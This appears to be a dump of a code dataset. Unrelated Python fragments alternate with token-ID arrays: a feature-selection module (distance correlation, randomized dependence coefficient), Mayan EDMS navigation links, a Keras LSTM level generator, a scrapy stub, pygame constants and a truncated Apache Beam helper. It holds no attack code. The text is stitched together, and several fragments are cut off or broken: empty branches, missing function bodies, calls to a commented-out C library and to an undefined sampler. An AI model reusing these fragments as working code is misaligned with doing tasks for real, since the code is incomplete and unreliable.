Yinlam Chow, Mohammad Ghavamzadeh, Lucas Janson, and Marco Pavone
Risk-constrained reinforcement learning with percentile risk criteria
J. Mach. Learn. Res. 2017
"""
import numpy as np
from torch import optim
import torch
from rl_safety_algorithms.algs.cpo.cpo import CPOAlgorithm
from rl_safety_algorithms.algs.core import ConstrainedPolicyGradientAlgorithm
from rl_safety_algorithms.algs.npg.npg import NaturalPolicyGradientAlgorithm
from rl_safety_algorithms.algs.trpo.trpo import TRPOAlgorithm
import rl_safety_algorithms.algs.utils as U
from rl_safety_algorithms.common import utils
import rl_safety_algorithms.common.mpi_tools as mpi_tools
| [
37811,
9485,
15884,
354,
7822,
286,
262,
37712,
20446,
30011,
1634,
357,
5760,
46,
8,
11862,
13,
198,
198,
13838,
25,
220,
220,
220,
220,
44611,
40214,
16261,
357,
82,
574,
13,
70,
1313,
16261,
31,
83,
388,
13,
2934,
8,
198,
41972,
... | 2.923547 | 327 |
import scrapy
from scrapy import Request
import scraper_helper as sh
from scrapy.selector import Selector
# Amazon product-reviews endpoint; format with a product ASIN.
review_url = 'https://www.amazon.com/product-reviews/{}'
asin_list = ['B08CVSL4K5']  # Roborock
| [
11748,
15881,
88,
198,
6738,
15881,
88,
1330,
19390,
198,
11748,
19320,
525,
62,
2978,
525,
355,
427,
198,
6738,
15881,
88,
13,
19738,
273,
1330,
9683,
273,
628,
198,
19023,
62,
6371,
796,
705,
5450,
1378,
2503,
13,
33103,
13,
785,
... | 2.9 | 70 |
from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.navigation.classes import Link
from .icons import (
icon_document_metadata_add, icon_document_metadata_edit,
icon_document_metadata_remove, icon_document_metadata_view,
icon_metadata_type_create, icon_metadata_type_delete,
icon_metadata_type_document_type_list, icon_metadata_type_edit,
icon_metadata_type_list, icon_document_type_metadata_type_list
)
from .permissions import (
permission_document_metadata_add, permission_document_metadata_edit,
permission_document_metadata_remove, permission_document_metadata_view,
permission_metadata_type_create, permission_metadata_type_delete,
permission_metadata_type_edit, permission_metadata_type_view
)
# --- Links on a single document: add/edit/remove/view its metadata. ---------
link_metadata_add = Link(
    args='object.pk', icon=icon_document_metadata_add,
    permissions=(permission_document_metadata_add,), text=_('Add metadata'),
    view='metadata:metadata_add',
)
link_metadata_edit = Link(
    args='object.pk', icon=icon_document_metadata_edit,
    permissions=(permission_document_metadata_edit,),
    text=_('Edit metadata'), view='metadata:metadata_edit'
)
# --- Bulk variants: act on a multi-document selection (hence no args). ------
link_metadata_multiple_add = Link(
    icon=icon_document_metadata_add, text=_('Add metadata'),
    view='metadata:metadata_multiple_add'
)
link_metadata_multiple_edit = Link(
    icon=icon_document_metadata_edit, text=_('Edit metadata'),
    view='metadata:metadata_multiple_edit'
)
link_metadata_multiple_remove = Link(
    icon=icon_document_metadata_remove, text=_('Remove metadata'),
    view='metadata:metadata_multiple_remove'
)
link_metadata_remove = Link(
    args='object.pk', icon=icon_document_metadata_remove,
    permissions=(permission_document_metadata_remove,),
    text=_('Remove metadata'), view='metadata:metadata_remove',
)
link_metadata_view = Link(
    args='resolved_object.pk', icon=icon_document_metadata_view,
    permissions=(permission_document_metadata_view,), text=_('Metadata'),
    view='metadata:metadata_view',
)
# --- Relationship editors between document types and metadata types. --------
link_document_type_metadata_type_relationship = Link(
    args='resolved_object.pk',
    icon=icon_document_type_metadata_type_list,
    permissions=(permission_document_type_edit,),
    text=_('Metadata types'), view='metadata:document_type_metadata_type_relationship',
)
link_metadata_type_document_type_relationship = Link(
    args='resolved_object.pk',
    icon=icon_metadata_type_document_type_list,
    permissions=(permission_document_type_edit,),
    text=_('Document types'), view='metadata:metadata_type_document_type_relationship',
)
# --- CRUD links for MetadataType objects themselves. ------------------------
link_metadata_type_create = Link(
    icon=icon_metadata_type_create,
    permissions=(permission_metadata_type_create,), text=_('Create new'),
    view='metadata:metadata_type_create'
)
link_metadata_type_delete = Link(
    args='object.pk', icon=icon_metadata_type_delete,
    permissions=(permission_metadata_type_delete,),
    tags='dangerous', text=_('Delete'), view='metadata:metadata_type_delete',
)
link_metadata_type_edit = Link(
    args='object.pk', icon=icon_metadata_type_edit,
    permissions=(permission_metadata_type_edit,),
    text=_('Edit'), view='metadata:metadata_type_edit'
)
link_metadata_type_list = Link(
    icon=icon_metadata_type_list,
    permissions=(permission_metadata_type_view,),
    text=_('Metadata types'), view='metadata:metadata_type_list'
)
| [
6738,
42625,
14208,
13,
26791,
13,
41519,
1330,
334,
1136,
5239,
62,
75,
12582,
355,
4808,
201,
198,
201,
198,
6738,
743,
272,
13,
18211,
13,
15390,
2886,
13,
525,
8481,
1330,
7170,
62,
22897,
62,
4906,
62,
19312,
201,
198,
6738,
74... | 2.873042 | 1,213 |
from __future__ import absolute_import, division, print_function
import ctypes
from numba import njit
import numpy as np
from os.path import dirname, join
import pandas as pd
from scipy.stats import rankdata as rank
from sklearn.feature_selection import mutual_info_classif
# from externals.six.moves import range
#######################
"""CREATE C WRAPPERS"""
#######################
# Define constants for wrapping C functions
# SHARED_OBJECT_DIR = join(dirname(__file__), 'bin')
# Weighted distance correlation
# CFUNC_DCORS_PATH = join(SHARED_OBJECT_DIR, 'dcor.so')
# CFUNC_DCORS_DLL = ctypes.CDLL(CFUNC_DCORS_PATH)
# CFUNC_DCORS_DLL.wdcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# ctypes.POINTER(ctypes.c_double) # w
# )
# CFUNC_DCORS_DLL.wdcor.restype = ctypes.c_double
# Unweighted distance correlation
# CFUNC_DCORS_DLL.dcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# )
# CFUNC_DCORS_DLL.dcor.restype = ctypes.c_double
###################################
"""FEATURE SELECTORS: CONTINUOUS"""
###################################
@njit(cache=True, nogil=True, fastmath=True)
def pcor(x, y):
    """Pearson correlation

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    Returns
    -------
    cor : float
        Pearson correlation; 0.0 when either input has zero variance
    """
    # Flatten any accidental 2d input to 1d.
    if x.ndim > 1: x = x.ravel()
    if y.ndim > 1: y = y.ravel()

    # Define variables for looping
    # Running sums: sum(x), sum(y), sum(x^2), sum(y^2), sum(x*y).
    n, sx, sy, sx2, sy2, sxy = len(x), 0.0, 0.0, 0.0, 0.0, 0.0

    # Loop to calculate statistics
    # (explicit single pass, written loop-style for numba nopython mode)
    for i in range(n):
        xi = x[i]
        yi = y[i]
        sx += xi
        sx2 += xi*xi
        sy += yi
        sy2 += yi*yi
        sxy += xi*yi

    # Covariance terms (each scaled by n^2; the scaling cancels in the ratio)
    cov = n*sxy - sx*sy
    ssx = n*sx2 - sx*sx
    ssy = n*sy2 - sy*sy

    # Catch division by zero errors
    if ssx == 0.0 or ssy == 0.0:
        # Zero variance in either input: correlation undefined, report 0.
        return 0.0
    else:
        return cov/np.sqrt(ssx*ssy)
def cca(X, Y):
    """Largest canonical correlation

    Parameters
    ----------
    X : 2d array-like
        Array of n elements

    Y : 2d array-like
        Array of n elements

    Returns
    -------
    cor : float
        Largest canonical correlation between X and Y, clipped to [0, 1]
        (the degenerate rank-0 case returns the literal list [0.0])
    """
    n_x_cols = X.shape[1]
    n_y_cols = Y.shape[1]

    # Center each matrix, then factor via QR.
    Qx, Rx = np.linalg.qr(X - X.mean(axis=0))
    Qy, Ry = np.linalg.qr(Y - Y.mean(axis=0))

    # Drop linearly dependent columns of X, bail out on zero rank.
    rank_x = np.linalg.matrix_rank(Rx)
    if rank_x == 0:
        return [0.0]
    if rank_x < n_x_cols:
        Qx = Qx[:, :rank_x]
        Rx = Rx[:rank_x, :rank_x]

    # Same reduction for Y.
    rank_y = np.linalg.matrix_rank(Ry)
    if rank_y == 0:
        return [0.0]
    if rank_y < n_y_cols:
        Qy = Qy[:, :rank_y]
        Ry = Ry[:rank_y, :rank_y]

    # Singular values of Qx'Qy are the canonical correlations; take the top one.
    _, sigma, _ = np.linalg.svd(np.dot(Qx.T, Qy))
    return np.clip(sigma[0], 0, 1)
def rdc(X, Y, k=10, s=1.0/6.0, f=np.sin):
    """Randomized dependence coefficient

    Parameters
    ----------
    X : 2d array-like
        Array of n elements

    Y : 2d array-like
        Array of n elements

    k : int
        Number of random projections

    s : float
        Variance of Gaussian random variables

    f : function
        Non-linear function

    Returns
    -------
    cor : float
        Randomized dependence coefficient between X and Y
    """
    # Promote 1d inputs to column vectors.
    if X.ndim < 2:
        X = X.reshape(-1, 1)
    if Y.ndim < 2:
        Y = Y.reshape(-1, 1)

    n_x, p_x = X.shape
    n_y, p_y = Y.shape

    # Empirical copula of X (column-wise ranks scaled to (0, 1]),
    # augmented with a bias column, then randomly projected.
    ones_x = np.ones((n_x, 1))
    cop_x = np.array([rank(X[:, j])/float(n_x) for j in range(p_x)]).reshape(n_x, p_x)
    cop_x = (s/cop_x.shape[1])*np.column_stack([cop_x, ones_x])
    cop_x = cop_x.dot(np.random.randn(cop_x.shape[1], k))

    # Same treatment for Y (random draws happen after X's, preserving order).
    ones_y = np.ones((n_y, 1))
    cop_y = np.array([rank(Y[:, j])/float(n_y) for j in range(p_y)]).reshape(n_y, p_y)
    cop_y = (s/cop_y.shape[1])*np.column_stack([cop_y, ones_y])
    cop_y = cop_y.dot(np.random.randn(cop_y.shape[1], k))

    # Non-linearity plus bias column, then reduce to a canonical correlation.
    feat_x = np.column_stack([f(cop_x), ones_x])
    feat_y = np.column_stack([f(cop_y), ones_y])
    return cca(feat_x, feat_y)
@njit(cache=True, nogil=True, fastmath=True)
def cca_fast(X, Y):
    """Largest canonical correlation

    Parameters
    ----------
    X : 2d array-like
        Array of n elements

    Y : 2d array-like
        Array of n elements

    Returns
    -------
    cor : 1d array
        Singular values (canonical correlations) between X and Y, largest
        first; np.array([0.0]) when either matrix has zero rank
    """
    # Columns for X and Y
    Xp = X.shape[1]
    Yp = Y.shape[1]

    # Center X and Y and then QR decomposition
    # (column means via explicit comprehension -- presumably because the
    # axis kwarg of np.mean is unavailable in numba nopython mode; verify)
    mu_x = np.array([np.mean(X[:, j]) for j in range(Xp)])
    mu_y = np.array([np.mean(Y[:, j]) for j in range(Yp)])
    X = X-mu_x
    Y = Y-mu_y
    Qx, Rx = np.linalg.qr(X)
    Qy, Ry = np.linalg.qr(Y)

    # Check rank for X
    rankX = np.linalg.matrix_rank(Rx)
    if rankX == 0:
        return np.array([0.0])
    elif rankX < Xp:
        Qx = Qx[:, 0:rankX]
        Rx = Rx[0:rankX, 0:rankX]

    # Check rank for Y
    rankY = np.linalg.matrix_rank(Ry)
    if rankY == 0:
        return np.array([0.0])
    elif rankY < Yp:
        Qy = Qy[:, 0:rankY]
        Ry = Ry[0:rankY, 0:rankY]

    # SVD then clip top eigenvalue
    # NOTE(review): unlike cca(), the full unclipped singular-value array is
    # returned; callers take element [0] and clamp it (see rdc_fast).
    QxQy = np.dot(Qx.T, Qy)
    _, cor, _ = np.linalg.svd(QxQy)
    return cor
@njit(cache=True, nogil=True, fastmath=True)
def rdc_fast(x, y, k=10, s=1.0/6.0, f=np.sin):
    """Randomized dependence coefficient

    Note: numba-jitted fast path for 1d inputs; mirrors rdc() but with
    the two-column (rank, bias) matrices built inline.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    k : int
        Number of random projections

    s : float
        Variance of Gaussian random variables

    f : function
        Non-linear function

    Returns
    -------
    cor : float
        Randomized dependence coefficient between x and y
    """
    # Shape of random vectors
    xn = x.shape[0]
    yn = y.shape[0]

    # X data
    # BUG FIX: np.argsort(x) alone yields the sorting permutation, not
    # per-sample ranks, which silently decouples x[i] from y[i].
    # argsort(argsort(x)) places rank(x[i]) at position i (the
    # empirical copula transform used by rank() in the non-fast rdc).
    x_ones = np.ones((xn, 1))
    X_ = np.argsort(np.argsort(x))/float(xn)
    X_ = 0.5*s*np.column_stack((X_, x_ones))
    X_ = np.dot(X_, np.random.randn(2, k))

    # Y data (same fix as X)
    y_ones = np.ones((yn, 1))
    Y_ = np.argsort(np.argsort(y))/float(yn)
    Y_ = 0.5*s*np.column_stack((Y_, y_ones))
    Y_ = np.dot(Y_, np.random.randn(2, k))

    # Apply canonical correlation and clip the top correlation into [0, 1]
    X_ = np.column_stack((f(X_), x_ones))
    Y_ = np.column_stack((f(Y_), y_ones))
    cor = cca_fast(X_, Y_)[0]

    if cor < 0.0:
        return 0.0
    elif cor > 1.0:
        return 1.0
    else:
        return cor
@njit(cache=True, nogil=True, fastmath=True)
def py_wdcor(x, y, weights):
    """Python port of C function for weighted distance correlation

    Note: Version is optimized for use with Numba. Works on the
    condensed upper triangle of the pairwise distance matrices, so both
    time and memory are O(n^2).

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    weights : 1d array-like
        Weight vector that sums to 1

    Returns
    -------
    dcor : float
        Distance correlation
    """
    # Define initial variables
    n = x.shape[0]
    s = int(n*(n-1)/2.)   # number of unique (i, j) pairs, i < j
    Edx = np.zeros(n)     # weighted row means of the x-distance matrix
    Edy = np.zeros(n)     # weighted row means of the y-distance matrix
    DMY = np.zeros(s)     # condensed pairwise distances for y
    DMX = np.zeros(s)     # condensed pairwise distances for x
    F = np.zeros(s)       # pairwise weight products w_i * w_j
    S1 = 0
    S2 = 0
    S3 = 0
    S2a = 0
    S2b = 0
    S1X = 0
    S1Y = 0
    S2X = 0
    S2Y = 0
    S3X = 0
    S3Y = 0
    k = 0
    # Single pass over the upper triangle accumulates the cross terms
    # and the per-row distance sums at the same time.
    for i in range(n-1):
        for j in range(i+1, n):
            # Distance matrices
            DMX[k] = np.fabs(x[i]-x[j])
            DMY[k] = np.fabs(y[i]-y[j])
            F[k] = weights[i]*weights[j]
            S1 += DMX[k]*DMY[k]*F[k]
            S1X += DMX[k]*DMX[k]*F[k]
            S1Y += DMY[k]*DMY[k]*F[k]
            Edx[i] += DMX[k]*weights[j]
            Edy[j] += DMY[k]*weights[i]
            Edx[j] += DMX[k]*weights[i]
            Edy[i] += DMY[k]*weights[j]
            k += 1

    # Means
    for i in range(n):
        S3 += Edx[i]*Edy[i]*weights[i]
        S2a += Edy[i]*weights[i]
        S2b += Edx[i]*weights[i]
        S3X += Edx[i]*Edx[i]*weights[i]
        S3Y += Edy[i]*Edy[i]*weights[i]

    # Variance and covariance terms; the factor 2 restores the full
    # (symmetric) matrix sums from the upper-triangle accumulation
    S1 = 2*S1
    S1Y = 2*S1Y
    S1X = 2*S1X
    S2 = S2a*S2b
    S2X = S2b*S2b
    S2Y = S2a*S2a

    # Guard against zero variance in either variable (dcor undefined,
    # reported as 0)
    if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
        return 0
    else:
        return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
@njit(cache=True, nogil=True, fastmath=True)
def py_dcor(x, y):
    """Python port of C function for distance correlation

    Note: Version is optimized for use with Numba. Unweighted variant
    of py_wdcor: every sample has weight 1/n, folded into the n^2, n^3
    and n^4 normalizations below.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    Returns
    -------
    dcor : float
        Distance correlation
    """
    # Define initial variables
    n = x.shape[0]
    s = int(n*(n-1)/2.)   # number of unique (i, j) pairs, i < j
    n2 = n*n
    n3 = n2*n
    n4 = n3*n
    Edx = np.zeros(n)     # row sums of the x-distance matrix
    Edy = np.zeros(n)     # row sums of the y-distance matrix
    DMY = np.zeros(s)     # condensed pairwise distances for y
    DMX = np.zeros(s)     # condensed pairwise distances for x
    S1 = 0
    S2 = 0
    S3 = 0
    S2a = 0
    S2b = 0
    S1X = 0
    S1Y = 0
    S2X = 0
    S2Y = 0
    S3X = 0
    S3Y = 0
    k = 0
    # Single pass over the upper triangle accumulates the cross terms
    # and the per-row distance sums at the same time.
    for i in range(n-1):
        for j in range(i+1, n):
            # Distance matrices
            DMX[k] = np.fabs(x[i]-x[j])
            DMY[k] = np.fabs(y[i]-y[j])
            S1 += DMX[k]*DMY[k]
            S1X += DMX[k]*DMX[k]
            S1Y += DMY[k]*DMY[k]
            Edx[i] += DMX[k]
            Edy[j] += DMY[k]
            Edx[j] += DMX[k]
            Edy[i] += DMY[k]
            k += 1

    # Means
    for i in range(n):
        S3 += Edx[i]*Edy[i]
        S2a += Edy[i]
        S2b += Edx[i]
        S3X += Edx[i]*Edx[i]
        S3Y += Edy[i]*Edy[i]

    # Variance and covariance terms; factor 2 restores the symmetric
    # matrix sums, and n^2/n^3/n^4 are the uniform-weight normalizers
    S1 = (2*S1)/float(n2)
    S1Y = (2*S1Y)/float(n2)
    S1X = (2*S1X)/float(n2)
    S2 = S2a*S2b/float(n4)
    S2X = S2b*S2b/float(n4)
    S2Y = S2a*S2a/float(n4)
    S3 /= float(n3)
    S3X /= float(n3)
    S3Y /= float(n3)

    # Guard against zero variance in either variable (dcor undefined,
    # reported as 0)
    if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
        return 0
    else:
        return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
# Mean helper passed to DataFrame.groupby(...).agg in approx_wdcor.
# A def statement rather than an assigned lambda (PEP 8 E731); behavior
# is identical.
def MEAN(z):
    """Return the arithmetic mean of sequence *z* as a float."""
    return sum(z)/float(len(z))
def approx_wdcor(x, y):
    """Approximate distance correlation by binning arrays

    NOTE: Code ported from R function approx.dcor at:
        https://rdrr.io/cran/extracat/src/R/wdcor.R

    Bins x and y, replaces each bin by its mean value, and computes a
    weighted distance correlation with bin frequencies as weights.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    Returns
    -------
    dcor : float
        Distance correlation
    """
    # Equal cuts and then create dataframe
    # NOTE(review): pd.cut is called with n bins for n samples --
    # presumably intentional (mirrors the R original), verify.
    n = x.shape[0]
    cx = pd.cut(x, n, include_lowest=True)
    cy = pd.cut(y, n, include_lowest=True)
    df = pd.DataFrame(
        np.column_stack([x, y, cx, cy]), columns=['x', 'y', 'cx', 'cy']
        )

    # Average values in interval
    vx = df['x'].groupby(df['cx'], sort=False).agg(MEAN).values
    vy = df['y'].groupby(df['cy'], sort=False).agg(MEAN).values

    # Calculate frequencies based on groupings
    f = df[['x', 'y']].groupby([df['cx'], df['cy']], sort=False).size()

    # Normalize weights and calculate weighted distance correlation
    w = f.values/float(f.values.sum())

    # Recompute n
    n = len(w)

    # Call either the Python or C version based on array length
    # NOTE(review): MultiIndex.labels was renamed to .codes in pandas
    # 0.24 and later removed -- this code requires pandas < 0.24 as
    # written; confirm the pinned pandas version.
    if n > 5000:
        return c_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
    else:
        return py_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
def c_wdcor(x, y, weights):
    """Wrapper around the compiled weighted distance correlation.

    Marshals the three float vectors into ctypes double arrays and
    dispatches to the C implementation in CFUNC_DCORS_DLL.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    weights : 1d array-like
        Weight vector that sums to 1

    Returns
    -------
    dcor : float
        Distance correlation
    """
    n_obs = x.shape[0]
    DoubleArray = ctypes.c_double*n_obs
    xs = DoubleArray(*x)
    ys = DoubleArray(*y)
    ws = DoubleArray(*weights)
    return CFUNC_DCORS_DLL.wdcor(xs, ys, ctypes.c_int(n_obs), ws)
def c_dcor(x, y):
    """Wrapper around the compiled (unweighted) distance correlation.

    Marshals both float vectors into ctypes double arrays and
    dispatches to the C implementation in CFUNC_DCORS_DLL.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    Returns
    -------
    dcor : float
        Distance correlation
    """
    n_obs = x.shape[0]
    DoubleArray = ctypes.c_double*n_obs
    xs = DoubleArray(*x)
    ys = DoubleArray(*y)
    return CFUNC_DCORS_DLL.dcor(xs, ys, ctypes.c_int(n_obs))
#################################
"""FEATURE SELECTORS: DISCRETE"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mc_fast(x, y, n_classes):
    """Multiple correlation

    Square root of the between-class to total sum-of-squares ratio of x
    grouped by the integer labels in y.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    n_classes : int
        Number of classes

    Returns
    -------
    cor : float
        Multiple correlation coefficient between x and y
    """
    grand_mean = x.mean()

    # Sum of squares total; constant x has no variance to explain
    dev = x - grand_mean
    sst = np.sum(dev*dev)
    if sst == 0.0:
        return 0.0

    # Sum of squares between classes, skipping empty classes
    ssb = 0.0
    for label in range(n_classes):
        members = x[y == label]
        size = members.shape[0]
        if size == 0:
            continue
        delta = members.mean() - grand_mean
        ssb += size*delta*delta

    return np.sqrt(ssb/sst)
def mi(x, y):
    """Mutual information

    Reshapes 1d input to the (n, 1) feature matrix expected by
    mutual_info_classif and returns the score for that single feature.

    Parameters
    ----------
    x : 1d array-like
        Array of n elements

    y : 1d array-like
        Array of n elements

    Returns
    -------
    info : float
        Mutual information between x and y
    """
    features = x.reshape(-1, 1) if x.ndim == 1 else x
    return mutual_info_classif(features, y)[0]
###############################
"""SPLIT SELECTORS: DISCRETE"""
###############################
@njit(cache=True, nogil=True, fastmath=True)
def gini_index(y, labels):
    """Gini index for node in tree

    Note: Despite being jitted, this function is still slow and a
    bottleneck in the actual training phase. Sklearn's Cython version
    is used to find the best split; this function is then called on the
    parent node and the two child nodes to compute feature importances
    via the mean decrease impurity formula.

    Parameters
    ----------
    y : 1d array-like
        Array of labels

    labels : 1d array-like
        Unique labels

    Returns
    -------
    gini : float
        Gini index
    """
    # Accumulate the sum of squared class proportions, then convert to
    # impurity: gini = 1 - sum_k p_k^2
    sq_sum = 0.0
    for label in labels:
        frac = np.mean(y == label)
        # Skip absent classes (proportion 0 contributes nothing)
        if frac > 0:
            sq_sum += frac*frac
    return 1 - sq_sum
#################################
"""SPLIT SELECTORS: CONTINUOUS"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mse(y):
    """Mean squared error for node in tree

    Computed as the mean squared deviation of y from its own mean
    (i.e. the node's variance).

    Parameters
    ----------
    y : 1d array-like
        Array of labels

    Returns
    -------
    error : float
        Mean squared error
    """
    resid = y - y.mean()
    return np.mean(resid*resid)
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
198,
198,
11748,
269,
19199,
198,
6738,
997,
7012,
1330,
299,
45051,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
28686,
13,
6978,
1330,
26672,
3672,
11,
... | 1.988381 | 7,918 |
import json
import psutil
__all__ = ['SystemdUnitStatus', 'Use']
| [
11748,
33918,
198,
11748,
26692,
22602,
198,
198,
834,
439,
834,
796,
37250,
11964,
67,
26453,
19580,
3256,
705,
11041,
20520,
628,
198
] | 2.956522 | 23 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Cross-platform utilities for creating subprocesses.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import platform
import subprocess
import traceback
from typing import TYPE_CHECKING
# On Windows, we need to use shell=True when creating subprocesses for binary
# paths to be resolved correctly.
force_shell = platform.system() == 'Windows'
# We mimic the interface of the standard Python subprocess module.
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
CalledProcessError = subprocess.CalledProcessError
if TYPE_CHECKING:
call = subprocess.call
check_call = subprocess.check_call
check_output = subprocess.check_output
Popen = subprocess.Popen
else:
| [
2,
198,
2,
49962,
284,
262,
24843,
10442,
5693,
357,
1921,
37,
8,
739,
530,
393,
517,
198,
2,
18920,
5964,
11704,
13,
220,
4091,
262,
28536,
2393,
9387,
351,
198,
2,
428,
670,
329,
3224,
1321,
5115,
6634,
9238,
13,
198,
2,
383,
... | 3.84 | 400 |
import pygame

# Custom pygame event ids and client state-machine constants.
# It seems that up to USEREVENT + 3 are already taken.
# Anyway, an event for server announces.
# It's about time for the server to advertise its presence.
E_ANNOUNCE = pygame.USEREVENT + 4
# A state change has occurred.
E_STATE = pygame.USEREVENT + 5
# Player in the lobby.
S_LOBBY = 0
# Player creating a new server.
S_CREATE = 1
# Player joining an existing game.
S_JOIN = 2
# Player in the game.
S_GAME = 3
# Player in the game, placing ships.
S_GAME_PLACING = 4
# Player in the game, waiting for their turn.
S_GAME_WAITING = 5
# Player's turn, cherry-picking the tile to bomb.
S_GAME_SHOOTING = 6
# Highest valid state id (equals S_GAME_SHOOTING by design).
S_GAME_LAST = 6
| [
11748,
12972,
6057,
198,
198,
2,
632,
2331,
326,
510,
284,
1294,
9338,
53,
3525,
1343,
513,
389,
1541,
2077,
13,
198,
2,
21836,
11,
281,
1785,
329,
4382,
26459,
13,
198,
198,
2,
632,
338,
546,
640,
329,
262,
4382,
284,
32740,
663,... | 2.877828 | 221 |
from __future__ import print_function

from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
import os

if __name__ == "__main__":
    # Word-level LSTM text generator: trains on a single level file
    # (path given as argv[1] relative to all_folders) and writes the
    # generated text of each training iteration to result_path.
    all_folders = "../levels_transposed/"
    result_path = "../levels_prediction_textfiles/"
    original_level_path = all_folders + sys.argv[1]

    try:
        text = open(original_level_path).read().lower()
    except UnicodeDecodeError:
        import codecs
        text = codecs.open(original_level_path, encoding='utf-8').read().lower()

    # Vocabulary and both-way index lookups.
    # BUG FIX: build the vocabulary from the already-decoded `text`
    # instead of re-reading the file without the codecs fallback (the
    # re-read crashed on files that needed the utf-8 branch above).
    words = set(text.split())
    word_indices = dict((c, i) for i, c in enumerate(words))
    indices_word = dict((i, c) for i, c in enumerate(words))

    maxlen = 30  # words per training sequence
    step = 3     # stride between successive training sequences
    print("maxlen:", maxlen, "step:", step)

    # Cut the corpus into overlapping word sequences; the word that
    # follows each sequence is its training target.
    sentences = []
    next_words = []
    list_words = text.lower().split()
    for i in range(0, len(list_words)-maxlen, step):
        sentences.append(' '.join(list_words[i: i + maxlen]))
        next_words.append(list_words[i + maxlen])

    # One-hot encode inputs (X) and targets (y).
    # BUG FIX: dtype=bool -- the deprecated np.bool alias was removed
    # in NumPy 1.24.
    X = np.zeros((len(sentences), maxlen, len(words)), dtype=bool)
    y = np.zeros((len(sentences), len(words)), dtype=bool)
    for i, sentence in enumerate(sentences):
        for t, word in enumerate(sentence.split()):
            X[i, t, word_indices[word]] = 1
        y[i, word_indices[next_words[i]]] = 1

    # Build the model: 2 stacked LSTMs with dropout and a softmax over
    # the vocabulary.
    model = Sequential()
    model.add(LSTM(512, return_sequences=True, input_shape=(maxlen, len(words))))
    model.add(Dropout(0.2))
    model.add(LSTM(512, return_sequences=False))
    model.add(Dropout(0.2))
    model.add(Dense(len(words)))
    model.add(Activation('softmax'))
    model.compile(loss='categorical_crossentropy', optimizer='rmsprop')

    # Resume from saved weights when available.
    # BUG FIX: os.path.isfile, not os.original_level_path.isfile
    # (AttributeError at runtime).
    if os.path.isfile('GoTweights'):
        model.load_weights('GoTweights')

    # Train the model; after each iteration, generate text from a
    # random seed at two sampling temperatures and save it.
    for iteration in range(1, 300):
        print()
        print('-' * 50)
        print('Iteration', iteration)
        model.fit(X, y, batch_size=64, nb_epoch=2)
        start_index = random.randint(0, len(list_words) - maxlen - 1)
        # BUG FIX: os.path.splitext, not os.original_level_path.splitext.
        predictionText = open(result_path + os.path.splitext(sys.argv[1])[0] + "_new_"+str(iteration)+".txt", "w+")
        loop_range = [1.0, 1.2]
        for diversity in loop_range:
            print()
            print('----- diversity:', diversity)
            generated = ''
            sentence = list_words[start_index: start_index + maxlen]
            generated += ' '.join(sentence)
            print('----- Generating with seed: "', sentence, '"')
            print()
            sys.stdout.write(generated)
            print()
            for i in range(1024):
                # One-hot encode the current seed window.
                x = np.zeros((1, maxlen, len(words)))
                for t, word in enumerate(sentence):
                    x[0, t, word_indices[word]] = 1.
                preds = model.predict(x, verbose=0)[0]
                # NOTE(review): sample() is assumed to be defined
                # elsewhere in this file (temperature sampling).
                next_index = sample(preds, diversity)
                next_word = indices_word[next_index]
                generated += next_word
                predictionText.write(next_word+"\n")
                # Slide the seed window forward by one word.
                del sentence[0]
                sentence.append(next_word)
                sys.stdout.write(' ')
                sys.stdout.write(next_word)
                sys.stdout.flush()
            print()
        # BUG FIX: close the per-iteration output file (was leaked).
        predictionText.close()
| [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
198,
6738,
41927,
292,
13,
27530,
1330,
24604,
1843,
198,
6738,
41927,
292,
13,
75,
6962,
13,
7295,
1330,
360,
1072,
11,
13144,
341,
11,
14258,
448,
198,
6738,
41927,
292,
13,
75,
... | 2.213536 | 1,714 |
# CLI
#
# Commands:
#   - transactions import <json>
#   - transaction show (?)
#   - account show [name] [date-from] [date-to] [aggregation:week|fortnight|*month*|quarter|year]
